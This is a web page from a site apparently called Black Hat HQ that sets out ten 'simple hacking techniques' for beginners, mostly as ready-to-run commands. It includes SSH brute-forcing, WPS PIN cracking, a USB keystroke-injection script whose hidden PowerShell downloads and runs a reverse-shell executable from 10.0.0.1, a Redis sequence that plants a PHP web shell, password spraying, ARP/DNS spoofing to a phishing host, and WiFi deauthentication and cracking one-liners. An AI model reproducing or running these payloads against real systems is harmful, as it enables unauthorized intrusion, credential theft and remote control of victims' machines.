top of page

10 Simple Hacking Techniques

10 Simple Hacking Techniques | Black Hat HQ

10 Simple Hacking Strategies


Quick-win tactics for beginners. 5-minute setups, high success on weak targets. Kali Linux assumed. These are 10 simple hacking techniques/strategies.


  1. Default Creds (90% Win)


# Routers: admin/admin
# Webcams: admin/blank
# Industrial: admin/password
nmap -p 80,8080,443 --script http-default-accounts 192.168.1.0/24
hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

Success: 40% IoT devices.


  1. WiFi WPS PIN (Instant)


wash -i wlan0mon  # Find WPS
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv  # PIN in seconds

Why: Old routers, offline math attack.


  1. USB Rubber Ducky (98% Plug Rate)


# $10 device → keystroke injection
REM ducky.exe
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "$c=(New-Object Net.WebClient);$c.DownloadString('http://10.0.0.1/shell.ps1')|$c.DownloadFile('http://10.0.0.1/shell.exe',$env:TEMP+'\s.exe');Start-Process $env:TEMP'\s.exe'"
ENTER

Payload: Reverse shell.


  1. Browser Autofill Harvest


# Phishing page with autocomplete="on"
<input type="text" name="email" autocomplete="email">
<input type="password" name="password" autocomplete="current-password">

Success: 60% auto-fill (PhishGuard).


  1. Printer Abuse (Zero Effort)


nmap --script smb-enum-shares 192.168.1.0/24 -p445
smbclient //192.168.1.50/print$ -N
put reverse_shell.exe

Tactic: Execute via IPP/LPD → shell.


  1. Windows Password Spray


# 100 users x 10 common passes = no lockout
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt --no-bruteforce

Common: Password123, Welcome1, SeasonYear.


  1. Open Redis (RCE)


redis-cli -h 192.168.1.100
> FLUSHALL
> SET 1 "<?php system($_GET['cmd']); ?>" 
> CONFIG SET dir /var/www/html/
> CONFIG SET dbfilename shell.php


  1. Heartbleed (Old SSL)


openssl s_client -connect target:443 -tlsextdebug 2>&1 | grep "Server certificate"
nmap --script ssl-heartbleed target

Dump: Private keys, memory.


  1. SMB Null Session


smbmap -H 192.168.1.50 -u ""
enum4linux -a 192.168.1.50

Loot: Shares, users, policies.


  1. PiHole / DNS Poison


# After WiFi → ARP spoof
bettercap -iface wlan0
> set arp.spoof.targets 192.168.1.100
> arp.spoof on
> set dns.spoof.domains *.company.com
> set dns.spoof.address 10.0.0.1
> dns.spoof on

Redirect: internal.company.com → phish.


One-Liner Killers


# All defaults: 
for i in {1..254}; do nmap -p 23,22,80,8080 --script http-default-accounts 192.168.1.$i; done

# WiFi handshake → crack:
airodump-ng wlan0mon & aireplay-ng -0 5 -a BSSID wlan0mon & aircrack-ng -w rockyou.txt capture.cap

# Phishing payload:
curl -d "user=admin&pass=PASSWORD" http://target/login.php

Success Matrix


Technique

Setup Time

Success %

Skill

Defaults

2 min

40%

Beginner

WPS

1 min

60%

Beginner

USB

5 min

98%

Beginner

Password Spray

3 min

25%

Beginner


WiFi Pentest Chain (10 Mins)


1. wifite --wpa → crack WiFi
2. nmap defaults → web login
3. hydra → creds
4. reverse shell → done

Report: "4/10 devices default creds (Critical)."


Enroll In Online Cybersecurity & Hacking Classes/Courses | Black Hat HQ


Comments


bottom of page